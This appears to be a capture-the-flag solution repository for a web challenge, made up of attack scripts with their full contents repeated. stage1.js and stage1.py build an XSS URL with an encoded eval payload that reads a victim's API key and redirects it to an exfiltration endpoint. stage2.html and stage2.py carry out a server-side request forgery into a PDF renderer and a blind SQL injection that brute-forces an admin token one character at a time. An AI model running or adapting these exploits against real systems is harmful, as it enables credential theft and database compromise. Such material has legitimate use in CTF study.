l4yton/stage1.js

## stage1.js
let requestbin = "";
fetch("https://api.wimc.ctf.allesctf.net/1.0/user", {method:"GET",cache:"force-cache"}).then(a => a.json()).then(b => document.location.href=requestbin + b["data"]["api_key"]);

## stage1.py
#!/usr/bin/env python3
import base64
import urllib.parse

payload = open('stage1.js', 'r').read()
url = f'https://wimc.ctf.allesctf.net/?api_key="-eval(atob("{urllib.parse.quote(urllib.parse.quote(base64.b64encode(payload.encode()).decode()))}"))-"'
print(url)

## stage2.html
<span style="color: green;" id="goodChars" name="goodChars"></span>
<br>
<span style="color: red;" id="badChars" name="badChars"></span>
<br>
<span style="color: indigo;" id="errorOut" name="errorOut"></span>
<script>
try {
        var ALPHABET = '0123456789abcdef';
        var PREFIX = "__TOKEN__";

        function judgeChar(xhr, candidate, prefix) {
                if (xhr.readyState !== 4)
                        return;

                // Old one arrived - discard
                if (goodChars.innerText.length > prefix.length)
                        return;

                if (xhr.status != 200) {
                        badChars.innerText += candidate;
                        return;
                }

                goodChars.innerText += candidate;
                badChars.innerText = '';

                prefix = goodChars.innerText;
                for (var i = 0; i < ALPHABET.length; i++)
                        testChar(ALPHABET.charAt(i), prefix);
        }

        function testChar(candidate, prefix) {
                var xhr = new XMLHttpRequest();
                xhr.open('POST', 'http://localhost:1337/internal/createTestWallet', true);
                xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
                xhr.onreadystatechange = function () {judgeChar(xhr, candidate, prefix)};
                xhr.send('balance=' + encodeURIComponent(
                        "(SELECT 1337 FROM general AS g WHERE g.api_key LIKE '" +
                        prefix + candidate +
                        "%' AND g.user_id = '13371337-1337-1337-1337-133713371337'),'test');-- "));
        }

        goodChars.innerText = PREFIX;
        for (var i = 0; i < ALPHABET.length; i++)
                testChar(ALPHABET.charAt(i), PREFIX);
} catch(e) {
        errorOut.innerText = e;
}
</script>

## stage2.py
#!/usr/bin/env python3
import os
import sys
import requests
import pdftotext

url = 'https://api.wimc.ctf.allesctf.net/1.0/admin/createReport'

headers = {
        'X-API-TOKEN': ''
}

with open('stage2.html', 'r') as f:
        template = f.read()

# r = requests.post(url, headers=headers, data={"html": f.read()})

token = ''

while len(token) < 30:
        payload = template.replace('__TOKEN__', token)
        r = requests.post(url, headers=headers, data={"html": payload})
        if len(r.text) < 100:
                print(r.text, file=sys.stderr)
                exit(1)

        result = open('result.pdf', 'wb')
        result.write(b''.join(r.iter_content()))
        result.close()

        result = open('result.pdf', 'rb')
        pdf = pdftotext.PDF(result)
        result.close()

        token = pdf[0].split('\n')[0]

os.remove('result.pdf')
print(f'Got token: {token}')
	let requestbin = "";
	fetch("https://api.wimc.ctf.allesctf.net/1.0/user", {method:"GET",cache:"force-cache"}).then(a => a.json()).then(b => document.location.href=requestbin + b["data"]["api_key"]);
	#!/usr/bin/env python3
	import base64
	import urllib.parse

	payload = open('stage1.js', 'r').read()
	url = f'https://wimc.ctf.allesctf.net/?api_key="-eval(atob("{urllib.parse.quote(urllib.parse.quote(base64.b64encode(payload.encode()).decode()))}"))-"'
	print(url)
	<span style="color: green;" id="goodChars" name="goodChars"></span>
	<br>
	<span style="color: red;" id="badChars" name="badChars"></span>
	<br>
	<span style="color: indigo;" id="errorOut" name="errorOut"></span>
	<script>
	try {
	var ALPHABET = '0123456789abcdef';
	var PREFIX = "__TOKEN__";

	function judgeChar(xhr, candidate, prefix) {
	if (xhr.readyState !== 4)
	return;

	// Old one arrived - discard
	if (goodChars.innerText.length > prefix.length)
	return;

	if (xhr.status != 200) {
	badChars.innerText += candidate;
	return;
	}

	goodChars.innerText += candidate;
	badChars.innerText = '';

	prefix = goodChars.innerText;
	for (var i = 0; i < ALPHABET.length; i++)
	testChar(ALPHABET.charAt(i), prefix);
	}

	function testChar(candidate, prefix) {
	var xhr = new XMLHttpRequest();
	xhr.open('POST', 'http://localhost:1337/internal/createTestWallet', true);
	xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
	xhr.onreadystatechange = function () {judgeChar(xhr, candidate, prefix)};
	xhr.send('balance=' + encodeURIComponent(
	"(SELECT 1337 FROM general AS g WHERE g.api_key LIKE '" +
	prefix + candidate +
	"%' AND g.user_id = '13371337-1337-1337-1337-133713371337'),'test');-- "));
	}

	goodChars.innerText = PREFIX;
	for (var i = 0; i < ALPHABET.length; i++)
	testChar(ALPHABET.charAt(i), PREFIX);
	} catch(e) {
	errorOut.innerText = e;
	}
	</script>
	#!/usr/bin/env python3
	import os
	import sys
	import requests
	import pdftotext

	url = 'https://api.wimc.ctf.allesctf.net/1.0/admin/createReport'

	headers = {
	'X-API-TOKEN': ''
	}

	with open('stage2.html', 'r') as f:
	template = f.read()

	# r = requests.post(url, headers=headers, data={"html": f.read()})

	token = ''

	while len(token) < 30:
	payload = template.replace('__TOKEN__', token)
	r = requests.post(url, headers=headers, data={"html": payload})
	if len(r.text) < 100:
	print(r.text, file=sys.stderr)
	exit(1)

	result = open('result.pdf', 'wb')
	result.write(b''.join(r.iter_content()))
	result.close()

	result = open('result.pdf', 'rb')
	pdf = pdftotext.PDF(result)
	result.close()

	token = pdf[0].split('\n')[0]

	os.remove('result.pdf')
	print(f'Got token: {token}')